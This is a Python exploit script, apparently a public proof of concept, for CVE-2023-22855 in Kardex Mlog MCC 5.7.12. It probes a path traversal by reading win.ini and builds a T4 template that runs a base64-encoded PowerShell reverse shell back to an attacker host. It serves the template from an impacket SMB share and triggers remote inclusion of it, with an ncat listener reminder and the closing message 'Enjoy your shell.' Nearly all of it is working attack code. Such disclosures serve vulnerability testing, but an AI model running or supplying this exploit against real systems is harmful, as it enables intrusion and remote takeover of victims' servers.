#!/usr/bin/env python3 # Exploit Title: Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution) # Date: 12/13/2022 # Exploit Author: Patrick Hener # Vendor Homepage: https://www.kardex.com/en/mlog-control-center # Version: 5.7.12+0-a203c2a213-master # Tested on: Windows Server 2016 # CVE : CVE-2023-22855 # Writeup: https://hesec.de/posts/CVE-2023-22855 # # You will need to run a netcat listener beforehand: ncat -lnvp # import requests, argparse, base64, os, threading from impacket import smbserver def probe(target): headers = { "Accept-Encoding": "deflate" } res = requests.get(f"{target}/\\Windows\\win.ini", headers=headers) if "fonts" in res.text: return True else: return False def gen_payload(lhost, lport): rev_shell_blob = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()' rev_shell_blob_b64 = base64.b64encode(rev_shell_blob.encode('UTF-16LE')) payload = f"""<#@ template language="C#" #> <#@ Import Namespace="System" #> <#@ Import Namespace="System.Diagnostics" #> <# var proc1 = new ProcessStartInfo(); string anyCommand; anyCommand = "powershell -e {rev_shell_blob_b64.decode()}"; proc1.UseShellExecute = true; proc1.WorkingDirectory = @"C:\Windows\System32"; proc1.FileName = @"C:\Windows\System32\cmd.exe"; proc1.Verb = "runas"; proc1.Arguments = "/c "+anyCommand; Process.Start(proc1); #>""" return payload def start_smb_server(lhost): server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445) server.addShare("SHARE", os.getcwd(), '') server.setSMB2Support(True) server.setSMBChallenge('') server.start() def trigger_vulnerability(target, lhost): headers = { "Accept-Encoding": "deflate" } requests.get(f"{target}/\\\\{lhost}\\SHARE\\exploit.t4", headers=headers) def main(): # Well, args parser = argparse.ArgumentParser() parser.add_argument('-t', '--target', help='Target host url', required=True) parser.add_argument('-l', '--lhost', help='Attacker listening host', required=True) parser.add_argument('-p', '--lport', help='Attacker listening port', required=True) args = parser.parse_args() # Probe if target is vulnerable print("[*] Probing target") if probe(args.target): print("[+] Target is alive and File Inclusion working") else: print("[-] Target is not alive or File Inclusion not working") exit(-1) # Write payload to file print("[*] Writing 'exploit.t4' payload to be included later on") with open("exploit.t4", 'w') as template: template.write(gen_payload(args.lhost, args.lport)) template.close() # Start smb server in background print("[*] Starting SMB Server in the background") smb_server_thread = threading.Thread(target=start_smb_server, name="SMBServer", args=(args.lhost,)) smb_server_thread.start() # Rev Shell reminder print("[!] At this point you should have spawned a rev shell listener") print(f"[i] 'ncat -lnvp {args.lport}' or 'rlwrap ncat -lnvp {args.lport}'") print("[?] Are you ready to trigger the vuln? Then press enter!") input() # Wait for input then continue # Trigger vulnerability print("[*] Now triggering the vulnerability") trigger_vulnerability(args.target, args.lhost) # Exit print("[+] Enjoy your shell. Bye!") os._exit(1) if __name__ == "__main__": main()